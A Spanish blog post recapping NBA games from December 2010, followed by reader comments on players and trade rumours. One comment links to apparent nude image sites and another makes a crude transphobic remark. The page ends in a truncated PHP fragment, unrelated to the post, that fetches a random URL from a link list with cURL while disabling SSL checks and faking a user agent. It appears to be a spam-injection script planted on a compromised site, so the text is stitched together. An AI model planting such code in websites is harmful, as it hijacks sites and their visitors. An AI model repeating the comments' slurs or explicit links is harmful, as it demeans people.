La crónica (17/12/2010)

18 de December de 2010 por TheDeerHunter

Poco tiempo y mucho que contar.

Jornada propicia para los españoles. Pau estuvo correcto en la victoria de L.A. en Philadelphia (93-81). En su debe estuvo el mal pase que magulló el dedo de Kobe neutralizándolo para todo el partido. Menos mal que Odom y Barnes estuvieron a un nivel sobresaliente porque Iguodala y Hawes les pusieron las cosas muy complicadas hasta entrado el último cuarto.

Calderon volvió y se vistió de Steve Nash para disfrute de su equipo y en especial de Bargnani inmenso. No es que fuera una victoria extraordinaria contra una potencia insalvable, sino contra los Nets (92-98), pero muy importante para volverse a coger al tren de playoffs a tiempo.

La grata sorpresa del día fue Rudy, jugando mucho y bien contra los Wolves y siendo pieza fundamental para amarrar una victoria tan necesaria (102-107). Ojalá esto sea un punto de inflexión aunque mucho nos temamos que volverá a los 15 minutitos de reloj en poco.

Ibaka también brilló en un bonito duelo contra DeMarcus Cousins, aunque estuviera algo deslucido ante la inmensa diferencia entre ambos equipos (87-102). La noche hubiera sido perfecta de no ser por Marc que cuajó un partido horrible en la derrota de los Grizzlies frente los Rockets. (87-103)  Se confirma que Yao está fuera el resto de la campaña, por no decir para siempre.

Dejando de mirarnos al ombligo hubo NBA más allá de nuestros compatriotas. A LeBron le dijeron de todo menos bonico en un nuevo recibimiento hostil esta vez en el Madison. Le gustará que le maltraten el cuerpo, porque otra vez sacó lo mejor de sí mismo con un triple doble estratosférico. Los Beach Boys por fin engrasados fueron demasiado para los Knicks y acumulan la 11ª victoria consecutiva (113-91).

Otro gran duelo a priori que luego resultó algo descafeinado fue el de CP3 contra Deron. Los Jazz estuvieron irreconocibles y los Hornets les dieron las del pulpo y algunas más (73-100). Al menos Sloan puede consolarse con la vuelta de Okur y la plantilla sana por primera vez desde hace evos.

Terminando, Nash se lesionó muy pronto y se estropeó el Mavs vs Suns (91-106); en cambio los Hawks recuperaron a Joe Johnson a tiempo de doblegar a los Bobcats (85-90); Los Pacers doblegaron a los Cavs (99-108) y los Clippers a los Pistons (109-88)… cualquier día de estos “el chiquillo” se va a romper la cabeza contra el aro.

PREMIOS

MVP: Se lo queda LeBron con 32 puntos, 11 rebotes y 10 asistencias. Majestuoso… pero cada día que pasa le reciben peor por las canchas del mundo.

Rookie: Podríamos dárselo a DeMarcus Cousins para variar… pero es que Blake Griffin es un pedazo de animal y lo que hace no es normal.

La sorpresa: Tantos días como decepción, la sorpresa de hoy es mallorquín y a veces juega como los ángeles. Rudy Fernández no fue un especialista tirador ayer. 26 puntos, 6 asistencias, 3 rebotes y 3 robos en 37 minutos de juego. Un +11 para el equipo de McMillan con él en pista.

La decepción: Ya que hoy estamos chauvinistas totales palo a Marc con un 2 de 16 que no tiene nombre. Para que luego digamos que no le dejan tirar en Memphis.

El mayor esfuerzo en vano: Roza lo cansino… pero otra vez Beasley & Love con 52-23-6 entre ambos. Igual a partir de ahora hay que mencionar también a Webster junto a ellos.

Comenta

22 comentarios a esta entrada

  1. Txusma dice:
    #1

    Blake Griffin All Stars!! Cuantos ala-pívots de la liga pueden hacer ese reservo en el aire a esa velocidad y a esa altura?

      Citar

  2. Rafa dice:
    #2

    37 minutos de juego Rudy? En el próximo partido no llegará a 10 para compensar…

      Citar

  3. -=TheKing=- dice:
    #3

    A ver empiezo por la verguenza que han dado los Suns, impotentes en ataque impotentes en defensa y con Mr Nash que poco más y se parte el cuello. Por cierto con ganas lla de ver un Dallas – Spurs.

    Ya sé porque Stoudemire ha mejorado tanto y esta a tan buen nivel, el motivo es ejercicio pelvico que reliza en casa con cierta señora que antes era más dada a entrenar con raperos.

    http://www.z-celebs.com/a/amber_rose_04/pics/amber_rose_12.jpg
    http://www.mrnudes.com/fcma/amber-rose/amber-rose-022.jpg

      Citar

  4. -=TheKing=- dice:
    #4

    Por cierto los Heat han presentado su candidatura al anillo, con un Arroyo que tine un porcentaje de 3p que asusta.

      Citar

  5. Jona dice:
    #5

    Por cierto que el puede haber pasado a Beasley este año para que demuestre este nivel que se le presuponía, el año pasado tenía la misma competencia , es decir , ninguna y no termino de explotar , aquí tiene que haber actuado el entrenador sino no lo entiendo esta mucho mas maduro

    ***Arroyo solo ha tirado 38 triples y imagino que la mayoría totalmente solo y lo normal es que vaya bajando mira a Bibby por ejemplo ya a tirado 110 triples y tiene un 52% tbn

      Citar

  6. HisRoyalAirness dice:
    #6

    Nadie piensa que si Love se queda el año que viene (tendrán que colmarlo de presentes) y llega Ricky, los Wolves si refuerzan un par de posiciones tienen un equipo muy pero que muy apañado? Todo esto dicho desde las espectativas que tengo con Ricky, que son muy altas.
    De Griffin ya ni hablo, en el primer cuarto llevaba ya 8 rebotes el animalito…
    Que partidazo de Lebron, que barbaridad, le entraba absolutamente todo desde cualquier lado! Pero sigo pensando que en playoffs ante buenos centers las van a pasar muuuuy putas.

      Citar

  7. sergio dice:
    #7

    Lo de Rudy es eso… una sorpresa. Muchos jugadores de inferior categoria han logrado partidos similares (y mas contra las “eminencias” defensivas exteriores de los Wolves). A su favor decir que el ritmo de los Blazers me hace pensar en un partido aun mejor del que dicen sus estadísticas. Y no pretendo desprestigiarlo en absoluto, pero en la NBA se ha convertido en un jugador de rachas por obra y gracia de Nate. Espero que lo de hoy no sea flor de un dia.

    Llevo viendo los ultimos 10 partidos o asi de los Lakers y Gasol hace siempre lo mismo: hincharse en anotacion con buenos porcentajes en los dos primeros cuartos y practicamente dejarse llevar en los dos ultimos. Y tampoco se aplica demasiado en defensa. Este año han cuajado grandes partidos contra él pivots de la “categoría” de Hawes y Milicic o Nene, Hibbert y Brook Lopez. Que conste lo digo como un ‘debe’ en su magnifica temporada y conociendo de antemano su dificultad para dosificarse.

    Indudablemente los Raptors me divierten mas con Calderon. Son un equipo muy peligroso ante plantillas con carencias defensivas como los Nets ayer.

    No se como el alley-hoop de DeAndre Jordan no esta ni entre las 10 mejores jugadas del dia en la NBA, pero supongo que teniendo a Blake Griffin haciendo barbaridades como ayer parece que los otros no hacen nada.

    “All around the woooorld…. city to city”

      Citar

  8. Rompe dice:
    #8

    El mayor problema que le veo a estos Heat es que son únicamente tres jugadores, los demás simplemente se aprovechan de los espacios que crean para anotar de vez en cuando (muy de vez en cuando). Pero, y si se lesiona alguno de los tres? Con la carga de minutos que llevan… Y el resto del equipo es un auténtico solar… No creo que lleguen a PO con cuerpo de dar guerra a nadie…

      Citar

  9. Denise dice:
    #9

    Debutó Vujacic con los Nets. Entre Sasha y Farmar, se marcaron un 7 de 24, casi nada, ya solo falta que Walton llegue a Nets para volver a ver el trío paquetorro juntos.
    O Marc espabila, o va a firmar un contrato menos jugoso de lo que se esperaba. Su temporada es decepcionante por el momento, y qué desastre de Thabeet, y pensar que lo puese como MIP en la porra:(
    Estos Sixers son una bacalá infame, que deshonra para esta histórica franquicia. Brand está lejos, muy lejos de ser aquel Mr. 20-10, Iguodala no vale como jugador franquicia, y jugadores jovenes y prometedores como Young, Louis Williams o Speights parecen que se van a quedar en jugadores de nivel medio bajo en la NBA. Los Lakers se confían demasiado cuando juegan con medianías, ya les pasó con los Raptors, con los Nets hace poco y hoy, han sufrido más de lo esperado contra Sixers, sólo cuando se han visto con el agua al cuello han sacado su mejor versión. El agente de Matt Barnes debe ser el peor de entre los agentes y representantes de jugadores, con la de paquetorros sueltos que pululan por la liga cobrando millonadas, y un pedazo juagdor de equipo como Barnes, en todos los equipos en los que ha estado, siempre cobrando sueldos bajísimos para lo que hay en la NBA.
    Tremendo James y los Heat, que anularon a Stoud, Felton y a todo Knicks que se le puso en medio. Adiós Orlando a volver a ganar el Sureste.
    @the king: Pues a mi me parece un poco tocomocho la novia de Amare, si yo me encuentro con eso a oscuras, pongo el culo contra la pared, parece un travesti.

      Citar

  10. KB # 24 dice:
    #10

    Denise, no crees que es demasiada casualidad que Barnes haya estado en los 4 equipos de California? Y en los Suns? Es chico es de allí y se debe encontrar muy a gusto por esa zona, sino no entiendo la razón del xk cobrar tan poco

      Citar

  11. Denise dice:
    #11

    En los Orlando Magic también cobraba “poco” para lo que hay en la NBA.

      Citar

  12. Denise dice:
    #12

    He leido un rumor…pero por favor, espero que solo sea un rumor. Arenas x Carter y Gortat. Lo que nos faltaba, no tenemos bastante con el de Lewis que ahora, comernos también el del Agente Pistolas. Este trade es un sin sentido tanto deportivo como sobre todo economicamente, espero que solo quede en un rumor.

      Citar

  13. KB # 24 dice:
    #13

    jajaja eso seria un super negocio para los Wizards, si acaba dándose ya se porqué les llaman magos jajaja entre la suerte que tuvieron en la lottery pick y en este trade… vaya tela

      Citar

  14. troll dice:
    #14

    jojojojojo Nelson-Arenas-Turkoglu-Bass-Howard

      Citar

  15. Txusma dice:
    #15

    Turkoglu anda en los Suns. Cambia su nombre por el Lewis…

    Este traspaso no tiene ningún tipo de sentido. El expiring de Carter puede vale mucho más q el cabeza loca de Gilbert.

      Citar

  16. scriers dice:
    #16

    Casi me dan pena los Timberwolves. Eso sí, es divertido verles. Me está decepcionando Ridnour, que es mejor de lo hecho estas últimas semanas. Lo que deben hacer es defender mejor, el equipo tiene que trabajar en esa dirección, porque ya tienen 2 jugadores sobre los que puede descansar el juego ofensivo.
    En cuanto a los españoles, yo dejé a Gasol saliéndose y ha terminado haciendo una segunda mitad muy flojita.
    Y Marc, ay Marc, es que no podemos querer que seas como tu hermano. A Marc le falta juego de pies y recursos bajo el aro, con un trabajo en ese sentido más su habilidad para rebotear, debería firmar un contrato rollo 4-6 millones por año.
    Y Lebron es un Cristiano en Basket, las mismas sensaciones.

      Citar

  17. Denise dice:
    #17

    Ese es un rumor sin sentido como ya apunté, pero hay otros rumores que podrían concretarse en verdad, como:
    Rashard Lewis – Gilbert Arenas
    Carter, Gortat, Pietrus y Primera Ronda por Turkoglu (otra vez, no!!!!!), Jason Richardson (me gusta) y Earl Clark (ni fu ni fa)
    Por lo que a los Magic le quedaría un roster con.
    Nelson-Duhon-Jason Williams
    Arenas-Redick
    Quentin-Turkoglu-Jason Richardson
    Bass-Anderson
    Howard-Clark-Orton
    Sis e concretase este traspaso, por nombre, Orlando tendría un plantillón, pero Arenas y Turkoglu en su estado de forma actual me dejan muchas, pero que muchas dudas, y en caso de no funcionar, van a dejar hipotecado al equipo. Lo que está claro es que Orlando va a moverse, porque está viendo que con ela ctual roster no se va a comer ni un colín.

      Citar

  18. Denise dice:
    #18

      Citar

  19. Txusma dice:
    #19

    A saber como funcionará el invento Arenas-Richardson-Turkoglu-Howard. No sé yo…

      Citar

  20. Jona dice:
    #20

    tendrían que haber buscado un mejor 4 en vez de Arenas

      Citar

  21. CAMPO2 dice:
    #21

    pero aclararme y carter a wizards o a suns?

      Citar

  22. HeiNeKeN dice:
    #22

    Vince a los Suns junto con Pietrus y Gortat
    Lewis a los Wizards
    Arenas, J-Rich (vuelven a juntarse), Turkoglu y Earl Clark rumbo Orlando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>